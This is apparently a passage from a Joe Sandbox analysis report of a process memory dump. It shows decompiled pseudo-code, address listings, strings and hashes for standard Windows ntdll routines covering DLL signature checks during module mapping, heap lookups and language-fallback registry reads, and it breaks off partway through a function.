0x0460b74d
0x0460b750
0x0460b755
0x0460b758
0x0460b758
0x0460b75e
0x0460b763
0x0460b764
0x0460b76a
0x0460b76d
0x0460b771
0x0460b776
0x0460b85c
0x0460b85d
0x0460b860
0x0460b865
0x04652ba1
0x04652ba2
0x04652ba9
0x04652bae
0x04652bae
0x0460b77c
0x0460b77c
0x0460b77c
0x0460b785
0x0460b788
0x04652bb6
0x04652bb9
0x00000000
0x00000000
0x04652bbf
0x04652bc5
0x04652bc9
0x04652be8
0x04652bed
0x04652bcb
0x04652be0
0x04652be5
0x04652bf3
0x04652bf8
0x04652bfd
0x04652c05
0x04652c0e
0x04652c0e
0x00000000
0x0460b78e
0x0460b78e
0x0460b78e
0x0460b791
0x0460b791
0x0460b797
0x0460b797
0x0460b79f
0x0460b7a9
0x0460b7af
0x0460b7af
0x0460b7b1
0x0460b7b6
0x0460b7e2
0x0460b7e2
0x0460b7e7
0x0460b880
0x0460b7ed
0x0460b7ed
0x0460b7ed
0x0460b7ef
0x0460b7f2
0x0460b7f2
0x0460b7f5
0x0460b7fa
0x04652c2d
0x04652c2e
0x04652c39
0x0460b800
0x0460b800
0x0460b802
0x0460b805
0x0460b808
0x0460b808
0x0460b80a
0x0460b80d
0x0460b816
0x0460b81c
0x0460b822
0x0460b82f
0x0460b88b
0x0460b892
0x0460b897
0x0460b899
0x0460b89b
0x0460b89e
0x0460b8a5
0x0460b8a8
0x0460b8aa
0x0460b8ac
0x0460b8ac
0x0460b8aa
0x0460b892
0x0460b831
0x0460b839
0x0460b83b
0x0460b83b
0x0460b844
0x0460b84b
0x0460b852
0x0460b7b8
0x0460b7ba
0x0460b7bf
0x0460b7c4
0x04652c18
0x04652c19
0x04652c23
0x0460b7ca
0x0460b7ca
0x0460b7cc
0x0460b7cf
0x0460b7d1
0x0460b7d1
0x0460b7d4
0x0460b7dc
0x0460b8bb
0x0460b8bb
0x0460b8be
0x0460b8be
0x0460b8c1
0x00000000
0x00000000
0x0460b8c3
0x0460b8c5
0x0460b8c7
0x0460b8e0
0x00000000
0x0460b8e0
0x0460b8cc
0x0460b8cc
0x00000000
0x0460b8cc
0x0460b8d6
0x0460b8d6
0x00000000
0x0460b7dc
0x0460b7b6

Strings

HEAP: , xrefs: 04652BE8
((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 04652BF3
HEAP[%wZ]: , xrefs: 04652BDB

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: 46187c66e502489c9d0b277699242faee0555a79b690fe85a52e9613b9b7f423
Instruction ID: 8fc81bb922d4ba880a349c530246a4aec61ee6d275502dac3d3210860356034c
Opcode Fuzzy Hash: 46187c66e502489c9d0b277699242faee0555a79b690fe85a52e9613b9b7f423
Instruction Fuzzy Hash: CF619B706002019FDB2CDF68C484B6ABBA5FF44B04F14C5AEE8598B395E770F892CB91

Uniqueness

Uniqueness Score: -1.00%

Function 045F7E41 Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E045F7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E045FCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E045EC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x46d5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E04665510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x46d5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E04607D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E04607D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E04667016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E04607D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E04607D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E04667016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0461A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E045EB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x045f7e4c
0x045f7e50
0x045f7e55
0x045f7e58
0x045f7e5d
0x045f7e71
0x045f7f33
0x045f7e77
0x045f7e77
0x045f7e79
0x045f7e79
0x045f7e7e
0x045f7f45
0x04649848
0x00000000
0x04649848
0x045f7f4e
0x045f7f53
0x045f7f5a
0x00000000
0x00000000
0x0464985a
0x04649862
0x04649866
0x00000000
0x0464986c
0x00000000
0x0464986c
0x045f7e84
0x045f7e84
0x045f7e8d
0x04649871
0x045f7eb8
0x045f7ec0
0x045f7ec0
0x045f7e9a
0x0464987e
0x00000000
0x00000000
0x04649884
0x0464988b
0x046498a7
0x046498ac
0x046498b1
0x046498b6
0x046498b8
0x046498b8
0x046498b9
0x00000000
0x046498b9
0x045f7ea0
0x045f7ea7
0x00000000
0x00000000
0x045f7eac
0x045f7eb1
0x045f7ec6
0x045f7ed0
0x046498cc
0x045f7ed6
0x045f7ed6
0x045f7ed6
0x045f7ede
0x045f7ee3
0x046498e3
0x046498f0
0x04649902
0x046498f2
0x046498fb
0x046498fb
0x04649907
0x0464991d
0x0464991d
0x04649907
0x046498e3
0x045f7ef0
0x045f7f14
0x045f7f14
0x045f7f1e
0x04649946
0x045f7f24
0x045f7f24
0x045f7f24
0x045f7f2c
0x0464996a
0x04649975
0x04649975
0x0464997e
0x04649993
0x04649993
0x0464997e
0x00000000
0x045f7ef2
0x045f7efc
0x045f7f0a
0x045f7f0e
0x04649933
0x00000000
0x04649933
0x00000000
0x045f7f0e
0x00000000
0x00000000
0x00000000
0x045f7eb1

Strings

LdrpCompleteMapModule, xrefs: 04649898
minkernel\ntdll\ldrmap.c, xrefs: 046498A2
Could not validate the crypto signature for DLL %wZ, xrefs: 04649891

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: dc5814190f3badba4c78fc8dbeffe42c4cf1a64461d5012db942a85ff5b30794
Instruction ID: 20836ddbcc79f7fc387f914800b899d430c0f28632a51ecfbbb5299725859ec4
Opcode Fuzzy Hash: dc5814190f3badba4c78fc8dbeffe42c4cf1a64461d5012db942a85ff5b30794
Instruction Fuzzy Hash: B051EF716007459FEB25CBB8CC44B2AB7A4FB48314F0409AAEA519B7D1E734FD04EB52

Uniqueness

Uniqueness Score: -1.00%

Function 045EE620 Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E045EE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E045EF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E046295D0();
						}
						if(_t78 != 0) {
							L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0462FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0462BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E04629600();
					if(_t97 < 0) {
						goto L6;
					}
					E0462BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L045EF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0462BB40(_t83, _t102 + 0x24, _t78);
								if(L045F43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0462BB40(_t84, _t102 + 0x24, _t94);
									if(L045F43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x045ee620
0x045ee628
0x045ee62f
0x045ee631
0x045ee635
0x045ee637
0x045ee63e
0x04645503
0x04645503
0x045ee64c
0x045ee64c
0x045ee651
0x00000000
0x00000000
0x045ee661
0x045ee665
0x0464542a
0x045ee715
0x045ee71a
0x045ee71c
0x045ee720
0x045ee720
0x045ee727
0x045ee736
0x045ee736
0x045ee743
0x045ee743
0x045ee673
0x045ee678
0x045ee67d
0x045ee682
0x045ee685
0x045ee692
0x045ee69b
0x045ee6a3
0x045ee6ad
0x045ee6b1
0x045ee6b2
0x045ee6bb
0x045ee6bf
0x045ee6c0
0x045ee6c8
0x045ee6cc
0x045ee6d5
0x045ee6d9
0x00000000
0x00000000
0x045ee6e5
0x045ee6ea
0x045ee6f9
0x045ee70b
0x045ee70f
0x04645439
0x0464545e
0x0464545e
0x00000000
0x0464545e
0x0464543b
0x0464543e
0x04645440
0x04645445
0x04645472
0x04645475
0x0464548d
0x04645493
0x046454a9
0x00000000
0x00000000
0x046454ab
0x046454b4
0x046454bc
0x046454c8
0x046454de
0x046454fb
0x046454e0
0x046454e6
0x046454eb
0x046454eb
0x046454de
0x00000000
0x046454bc
0x04645477
0x0464547a
0x04645480
0x04645483
0x04645486
0x0464548b
0x00000000
0x00000000
0x00000000
0x0464548b
0x00000000
0x00000000
0x00000000
0x00000000
0x04645447
0x04645447
0x04645447
0x04645447
0x0464544e
0x00000000
0x00000000
0x04645450
0x04645452
0x04645455
0x0464545a
0x00000000
0x00000000
0x00000000
0x0464545c
0x0464546a
0x0464546d
0x0464546f
0x00000000
0x0464546f
0x045ee70f

Strings

@, xrefs: 045EE6C0
InstallLanguageFallback, xrefs: 045EE6DB
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 045EE68C

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: 5b022d569230d8af6d2f255122f61c0955a5859e96df9e49b99aefa83cd0e1f2
Instruction ID: 1b216ad9122e6333c2b57639a4ef1ca28d29d55f38fb2f7af8ae03b0f1ef89a1
Opcode Fuzzy Hash: 5b022d569230d8af6d2f255122f61c0955a5859e96df9e49b99aefa83cd0e1f2
Instruction Fuzzy Hash: DB51B276514355ABDB14DF64C440A7BB3E8BF98715F04092EFA86D7240FB34EA04CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0460B8E4 Relevance: 3.8, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0460B8E4(unsigned int __edx) {
				void* __ecx;
				void* __edi;
				intOrPtr* _t16;
				intOrPtr _t18;
				void* _t27;
				void* _t28;
				unsigned int _t30;
				intOrPtr* _t31;
				unsigned int _t38;
				void* _t39;
				unsigned int _t40;

				_t40 = __edx;
				_t39 = _t28;
				if( *0x46d8748 >= 1) {
					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
						_t18 =  *[fs:0x30];
						__eflags =  *(_t18 + 0xc);
						if( *(_t18 + 0xc) == 0) {
							_push("HEAP: ");
							E045EB150();
						} else {
							E045EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
						E045EB150();
						__eflags =  *0x46d7bc8;
						if(__eflags == 0) {
							E046A2073(_t27, 1, _t39, __eflags);
						}
					}
				}
				_t38 =  *(_t39 + 0xb8);
				if(_t38 != 0) {
					_t13 = _t40 >> 0xc;
					__eflags = _t13;
					while(1) {
						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
							break;
						}
						_t30 =  *_t38;
						__eflags = _t30;
						if(_t30 != 0) {
							_t38 = _t30;
							continue;
						}
						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
						break;
					}
					return E0460AB40(_t39, _t38, 0, _t13, _t40);
				} else {
					_t31 = _t39 + 0x8c;
					_t16 =  *_t31;
					while(_t31 != _t16) {
						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
							return _t16;
						}
						_t16 =  *_t16;
					}
					return _t31;
				}
			}

0x0460b8f0
0x0460b8f2
0x0460b8f4
0x04652c4e
0x04652c50
0x04652c56
0x04652c5c
0x04652c60
0x04652c7f
0x04652c84
0x04652c62
0x04652c77
0x04652c7c
0x04652c8a
0x04652c8f
0x04652c94
0x04652c9c
0x04652ca5
0x04652ca5
0x04652c9c
0x04652c50
0x0460b8fa
0x0460b902
0x0460b921
0x0460b921
0x0460b924
0x0460b924
0x0460b927
0x00000000
0x00000000
0x0460b929
0x0460b92b
0x0460b92d
0x0460b940
0x00000000
0x0460b940
0x0460b932
0x0460b932
0x00000000
0x0460b932
0x00000000
0x0460b904
0x0460b904
0x0460b90a
0x0460b90c
0x0460b916
0x0460b919
0x0460b915
0x0460b915
0x0460b91b
0x0460b91b
0x00000000
0x0460b910

Strings

(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 04652C8A
HEAP: , xrefs: 04652C7F
HEAP[%wZ]: , xrefs: 04652C72

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: 61a23e6a5115827e8be9621b3d65d34950a58320c3e3a52b0ae007efa5b3be1e
Instruction ID: 304c17e6ca8d84503c17fccbd24d3abcf5ecf0e303fd1feff468f9c016954589
Opcode Fuzzy Hash: 61a23e6a5115827e8be9621b3d65d34950a58320c3e3a52b0ae007efa5b3be1e
Instruction Fuzzy Hash: EC11AC313055029FE72CDB95C494B36B3A5FB81A25F18C56DE44ACB392F630F941EA45

Uniqueness

Uniqueness Score: -1.00%

Function 046AE539 Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E046AE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E046ABBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E046ABCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E046AAFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E04629730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E046AA80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E046AA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E04629730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E046AA80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E046AA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E04602280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E045FB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E045FFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E04607D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0469FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x046ae547
0x046ae549
0x046ae54f
0x046ae553
0x046ae557
0x046ae55a
0x046ae55c
0x046ae55f
0x046ae561
0x046ae567
0x046ae56b
0x046ae7e2
0x00000000
0x046ae571
0x046ae575
0x046ae577
0x046ae57b
0x046ae57c
0x046ae57d
0x046ae57e
0x046ae57f
0x046ae588
0x046ae58f
0x046ae591
0x046ae592
0x046ae592
0x046ae596
0x046ae59e
0x046ae5a0
0x046ae5a6
0x046ae61d
0x046ae61d
0x046ae621
0x046ae623
0x046ae630
0x046ae630
0x046ae7e6
0x046ae7eb
0x046ae7ed
0x046ae7f4
0x046ae7fa
0x046ae7ff
0x046ae7ff
0x046ae80a
0x046ae812
0x046ae812
0x046ae5ab
0x046ae5b4
0x046ae5b9
0x046ae5be
0x046ae5c0
0x046ae5c2
0x046ae5c8
0x046ae5c9
0x046ae5cb
0x046ae5cc
0x046ae5d5
0x046ae5e4
0x046ae5f1
0x046ae5f8
0x046ae5f8
0x046ae5d5
0x046ae602
0x046ae616
0x046ae63d
0x046ae644
0x046ae64d
0x046ae652
0x046ae657
0x046ae659
0x046ae65b
0x046ae661
0x046ae662
0x046ae664
0x046ae665
0x046ae66e
0x046ae67d
0x046ae68a
0x046ae691
0x046ae691
0x046ae66e
0x046ae6b0
0x00000000
0x046ae6b6
0x046ae6bd
0x046ae6c7
0x046ae6d7
0x046ae6d9
0x046ae6db
0x046ae6de
0x046ae6e3
0x046ae6f3
0x046ae6fc
0x046ae700
0x046ae700
0x046ae704
0x046ae70a
0x046ae70a
0x046ae713
0x046ae716
0x046ae719
0x046ae720
0x046ae761
0x046ae76b
0x046ae774
0x046ae77a
0x046ae77a
0x046ae78a
0x046ae791
0x046ae799
0x046ae79b
0x046ae79f
0x046ae7aa
0x046ae7c0
0x046ae7ac
0x046ae7b2
0x046ae7b9
0x046ae7b9
0x046ae7c7
0x046ae806
0x00000000
0x046ae7c9
0x046ae7d1
0x046ae7d8
0x00000000
0x046ae7d8
0x00000000
0x00000000
0x046ae722
0x046ae72e
0x046ae748
0x046ae74c
0x046ae754
0x046ae756
0x046ae75c
0x046ae75c
0x00000000
0x046ae75c
0x046ae758
0x046ae758
0x00000000
0x046ae758
0x046ae750
0x00000000
0x00000000
0x046ae752
0x00000000
0x046ae752
0x046ae730
0x046ae735
0x046ae73d
0x046ae73f
0x00000000
0x00000000
0x046ae741
0x046ae741
0x00000000
0x046ae741
0x046ae739
0x00000000
0x00000000
0x046ae73b
0x00000000
0x046ae73b
0x046ae722
0x046ae720
0x046ae6b0
0x046ae618
0x00000000
0x046ae618

Strings

`, xrefs: 046AE670
`, xrefs: 046AE5D7

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: 862fb445007318300de103c1d404cf8e4688f457325e4c63f9b99770b7ecb204
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: D9917A31244B429FE724CE65C840B1BB7E6AF94714F18892DF995CA280E776FD14CF52

Uniqueness

Uniqueness Score: -1.00%

Function 046651BE Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E046651BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
